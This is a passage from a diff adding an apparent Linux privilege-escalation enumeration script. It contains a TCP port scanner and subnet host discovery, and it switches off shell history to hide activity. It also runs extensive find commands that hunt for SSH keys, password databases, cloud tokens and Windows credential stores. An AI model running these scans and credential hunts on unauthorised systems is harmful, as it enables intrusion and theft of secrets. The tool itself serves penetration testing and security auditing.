10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389"
+ else
+ PORTS="$(echo $PORTS | tr ',' ' ')"
+ printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
+ printf "$NC\n"
+ fi
+
+ for port in $PORTS; do
+ if [ "$FOUND_BASH" ]; then
+ $FOUND_BASH -c "(echo </dev/tcp/$IP/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP:$port\"" &
+ elif [ "$NC_SCAN" ]; then
+ ($NC_SCAN "$IP" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
+ fi
+ done
+ wait
+}
+
+discover_network (){
+ #Check if IP and Netmask are correct and the use fping or ping to find hosts
+ basic_net_info
+
+ print_title "Network Discovery"
+
+ DISCOVERY=$1
+ IP=$(echo "$DISCOVERY" | cut -d "/" -f 1)
+ NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2)
+
+ if [ -z "$IP" ] || [ -z "$NETMASK" ]; then
+ printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC;
+ printf ${BLUE}"$HELP"$NC;
+ exit 0
+ fi
+
+ #Using fping if possible
+ if [ "$FPING" ]; then
+ $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED},"
+
+ #Loop using ping
+ else
+ if [ "$NETMASK" -eq "24" ]; then
+ printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC"
+ icmp_recon $IP
+
+ elif [ "$NETMASK" -eq "16" ]; then
+ printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC"
+ for i in $(seq 1 254)
+ do
+ NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1
+ icmp_recon "$NEWIP"
+ done
+ else
+ printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping mode. Netmask detected: $NETMASK"$NC;
+ exit 0
+ fi
+ fi
+}
+
+discovery_port_scan (){
+ basic_net_info
+
+ #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389
+ print_title "Internal Network Discovery - Finding hosts and scanning ports"
+ DISCOVERY=$1
+ MYPORTS=$2
+
+ IP=$(echo "$DISCOVERY" | cut -d "/" -f 1)
+ NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2)
+ echo "Scanning: $DISCOVERY"
+
+ if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then
+ printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC;
+ if [ "$IP" = "$NETMASK" ]; then
+ printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i <IP> [-p <PORT(s)>]\n\n"$NC;
+ fi
+ printf ${BLUE}"$HELP"$NC;
+ exit 0
+ fi
+
+ PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ',' ' ')"
+ PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) #Delete repetitions
+
+ if [ "$NETMASK" -eq "24" ]; then
+ printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC
+ tcp_recon "$IP" "$PORTS"
+
+ elif [ "$NETMASK" -eq "16" ]; then
+ printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC
+ for i in $(seq 0 255)
+ do
+ NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1
+ tcp_recon "$NEWIP" "$PORTS"
+ done
+ else
+ printf $RED"[-] Err: Sorry, only netmask /24 and /16 are supported in port discovery mode. Netmask detected: $NETMASK\n"$NC;
+ exit 0
+ fi
+}
+
+
+###########################################
+#---) Exporting history env variables (---#
+###########################################
+
+unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
+export HISTFILE=/dev/null
+export HISTSIZE=0
+export HISTFILESIZE=0
+
+
+
+###########################################
+#-----------) Some Basic Info (-----------#
+###########################################
+
+print_title "Basic information"
+printf $LG"OS: "$NC
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+printf $LG"User & Groups: "$NC
+(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$idB,${SED_RED},g"
+printf $LG"Hostname: "$NC
+hostname 2>/dev/null
+printf $LG"Writable folder: "$NC;
+echo $Wfolder
+
+if ! [ "$FAST" ] && ! [ "$AUTO_NETWORK_SCAN" ]; then
+ printf $LG"Remember that you can use the '-t' option to call the Internet connectivity checks and automatic network recon!\n"$NC;
+fi
+
+if [ "$DISCOVER_BAN_GOOD" ]; then
+ printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC"
+else
+ printf $RED"[-] $DISCOVER_BAN_BAD\n$NC"
+fi
+
+if [ "$SCAN_BAN_GOOD" ]; then
+ printf "$SCAN_BAN_GOOD\n$NC"
+else
+ printf $RED"[-] $SCAN_BAN_BAD\n$NC"
+fi
+if [ "$(command -v nmap 2>/dev/null)" ];then
+ NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discovery & port scanning, you should use it yourself"
+ printf $YELLOW"[+] $NMAP_GOOD\n$NC"
+fi
+echo ""
+echo ""
+
+###########################################
+#--------) Check if network jobs (--------#
+###########################################
+if [ "$PORTS" ]; then
+ if [ "$SCAN_BAN_GOOD" ]; then
+ if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then
+ printf $RED"[-] Err: Symbols detected in the port, for discovering purposes select only 1 port\n"$NC;
+ printf ${BLUE}"$HELP"$NC;
+ exit 0
+ else
+ #Select the correct configuration of the netcat found
+ select_nc
+ fi
+ else
+ printf $RED" Err: Port scan not possible, any netcat in PATH\n"$NC;
+ printf ${BLUE}"$HELP"$NC;
+ exit 0
+ fi
+fi
+
+if [ "$DISCOVERY" ]; then
+ if [ "$PORTS" ]; then
+ discovery_port_scan $DISCOVERY $PORTS
+ else
+ if [ "$DISCOVER_BAN_GOOD" ]; then
+ discover_network $DISCOVERY
+ else
+ printf $RED" Err: Discovery not possible, no fping or ping in PATH\n"$NC;
+ fi
+ fi
+ exit 0
+
+elif [ "$IP" ]; then
+ select_nc
+ tcp_port_scan $IP "$PORTS"
+ exit 0
+fi
+
+
+#Get HOMESEARCH
+HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")"
+if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder
+ HOMESEARCH="$HOME $HOMESEARCH"
+fi
+GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|"
+
+
+
+
+###########################################
+#----------) Caching Finds (--------------#
+###########################################
+if [ "$SEARCH_IN_FOLDER" ]; then
+ printf $GREEN"Caching directories "$NC
+
+ CONT_THREADS=0
+ # FIND ALL KNOWN INTERESTING SOFTWARE FILES
+ FIND_DIR_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -type d -name \".password-store\" -o -name \"sentry\" -o -name \".svn\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \"kube-proxy\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"pam.d\" -o -name \"system-connections\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"kubelet\" -o -name \"postfix\" -o -name \"system.d\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"kubernetes\" -o -name \"bind\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_CUSTOM=`eval_bckgrd "find $SEARCH_IN_FOLDER -name \"scclient.exe\" -o -name \"passbolt.php\" -o -name \"*.csr\" -o -name \"*.pfx\" -o -name \"snmpd.conf\" -o -name \"unattend.inf\" -o -name \"postgresql.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"*_history*\" -o -name \"scheduledtasks.xml\" -o -name \"access_tokens.db\" -o -name \"*.p12\" -o -name \"passwd.ibd\" -o -name \"*.keyring\" -o -name \"gitlab.rm\" -o -name \"ws_ftp.ini\" -o -name \"sess_*\" -o -name \"*.crt\" -o -name \"sysprep.inf\" -o -name \"cloud.cfg\" -o -name \".k5login\" -o -name \"iis6.log\" -o -name \".recently-used.xbel\" -o -name \"backup\" -o -name \"mongod*.conf\" -o -name \".wgetrc\" -o -name \"debian.cnf\" -o -name \"*.kdbx\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"web*.config\" -o -name \"passwd\" -o -name \"pagefile.sys\" -o -name \".htpasswd\" -o -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \".pypirc\" -o -name \"*.jks\" -o -name \"hosts.equiv\" -o -name \"SecEvent.Evt\" -o -name \"php.ini\" -o -name \".vault-token\" -o -name \"psk.txt\" -o -name \"zabbix_server.conf\" -o -name \".profile\" -o -name \"exports\" -o -name \"wp-config.php\" -o -name \"*knockd*\" -o -name \".erlang.cookie\" -o -name \"sssd.conf\" -o -name \"ConsoleHost_history.txt\" -o -name \"*.ovpn\" -o -name \"accessTokens.json\" -o -name \"security.sav\" -o -name \"rktlet.sock\" -o -name \".gitconfig\" -o -name \"ntuser.dat\" -o -name \"unattended.xml\" -o -name \"AzureRMContext.json\" -o -name \"glusterfs.key\" -o -name \"ipsec.secrets\" -o -name \"frakti.sock\" -o -name \"docker-compose.yml\" -o -name \"*.socket\" -o -name \"supervisord.conf\" -o -name \"backups\" -o -name \"gvm-tools.conf\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"filezilla.xml\" -o -name \".ldaprc\" -o -name \"kcpassword\" -o -name \"sentry.conf.py\" -o -name \"*.viminfo\" -o -name \"*.cer\" -o -name \"*vnc*.txt\" -o -name \"rocketchat.service\" -o -name \"cesi.conf\" -o -name \"protecteduserkey.bin\" -o -name \"hostapd.conf\" -o -name \"ipsec.conf\" -o -name \"*.gpg\" -o -name \"index.dat\" -o -name \"RDCMan.settings\" -o -name \"id_rsa*\" -o -name \"crio.sock\" -o -name \".rhosts\" -o -name \"*.gnupg\" -o -name \"redis.conf\" -o -name \"kibana.y*ml\" -o -name \".msmtprc\" -o -name \"mariadb.cnf\" -o -name \"Ntds.dit\" -o -name \"*config*.php\" -o -name \"default.sav\" -o -name \"*vnc*.ini\" -o -name \"unattend.txt\" -o -name \"drives.xml\" -o -name \"KeePass.enforced*\" -o -name \"glusterfs.ca\" -o -name \"db.php\" -o -name \"authorized_hosts\" -o -name \"*.ftpconfig\" -o -name \"SYSTEM\" -o -name \"jetty-realm.properties\" -o -name \"secrets.yml\" -o -name \"sysprep.xml\" -o -name \"*.sqlite3\" -o -name \"AppEvent.Evt\" -o -name \"*.psk\" -o -name \"SAM\" -o -name \"*.sqlite\" -o -name \"pgsql.conf\" -o -name \"my.ini\" -o -name \"gitlab.yml\" -o -name \"*.key\" -o -name \"id_dsa*\" -o -name \"azureProfile.json\" -o -name \"kadm5.acl\" -o -name \"zabbix_agentd.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"setupinfo.bak\" -o -name \"rsyncd.secrets\" -o -name \"sites.ini\" -o -name \"wcx_ftp.ini\" -o -name \"agent*\" -o -name \"influxdb.conf\" -o -name \"secrets.ldb\" -o -name \"authorized_keys\" -o -name \".env\" -o -name \"*.keystore\" -o -name \"ssh*config\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"rsyncd.conf\" -o -name \"*.db\" -o -name \"FreeSSHDservice.ini\" -o -name \"fastcgi_params\" -o -name \"https-xampp.conf\" -o -name \"my.cnf\" -o -name \"ftp.config\" -o -name \"autologin\" -o -name \"bash.exe\" -o -name \"*.pem\" -o -name \"ffftp.ini\" -o -name \".bashrc\" -o -name \".lesshst\" -o -name \"NetSetup.log\" -o -name \"sitemanager.xml\" -o -name \"winscp.ini\" -o -name \"credentials.db\" -o -name \"storage.php\" -o -name \"*.rdg\" -o -name \"datasources.xml\" -o -name \"wsl.exe\" -o -name \".git-credentials\" -o -name \".google_authenticator\" -o -name \"recentservers.xml\" -o -name \"known_hosts\" -o -name \"docker.socket\" -o -name \"racoon.conf\" -o -name \"error.log\" -o -name \"software.sav\" -o -name \"containerd.sock\" -o -name \".plan\" -o -name \"*.der\" -o -name \".git\" -o -name \"httpd.conf\" -o -name \"anaconda-ks.cfg\" -o -name \"*.pgp\" -o -name \"000-default.conf\" -o -name \"access.log\" -o -name \"setupinfo\" -o -name \"Dockerfile\" -o -name \"ddclient.conf\" -o -name \".github\" -o -name \"mosquitto.conf\" -o -name \"*.keytab\" -o -name \"KeePass.ini\" -o -name \"pg_hba.conf\" -o -name \"groups.xml\" -o -name \"system.sav\" -o -name \"docker.sock\" -o -name \"ftp.ini\" -o -name \"config.php\" -o -name \"TokenCache.dat\" -o -name \"password*.ibd\" -o -name \"autologin.conf\" -o -name \"appcmd.exe\" -o -name \"dockershim.sock\" -o -name \"software\" -o -name \"access_tokens.json\" -o -name \"server.xml\" -o -name \"settings.php\" -o -name \"vault-ssh-helper.hcl\" -o -name \"glusterfs.pem\" -o -name \"krb5.conf\" -o -name \"unattend.xml\" -o -name \"https.conf\" -o -name \"creds*\" -o -name \"KeePass.config*\" -o -name \"*password*\" -o -name \"tomcat-users.xml\" -o -name \"*.swp\" -o -name \".secrets.mkey\" -o -name \"pwd.ibd\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+
+
+ wait # Always wait at the end
+ CONT_THREADS=0 #Reset the threads counter
+
+elif echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then
+
+ printf $GREEN"Caching directories "$NC
+
+ CONT_THREADS=0
+ # FIND ALL KNOWN INTERESTING SOFTWARE FILES
+ FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"pam.d\" -o -name \"system-connections\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"system.d\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"kubernetes\" -o -name \"bind\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
+ FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".password-store\" -o -name \".svn\" -o -name \"sentry\" -o -name \"couchdb\" -o -name \".bluemix\" -o -name \".cloudflared\" -o -name \".vnc\" -o -name \"logstash\" -o -name \"neo4j\" -o -name \"environments\" -o -name \"postfix\" -o -name \"keyrings\" -o -name \".irssi\" -o -name \"ldap\" -o -name \"roundcube\" -o -name \"zabbix\" -o -name \"seeddms*\" -o -name \"sites-enabled\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \"mysql\" -o -name \".kube*\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
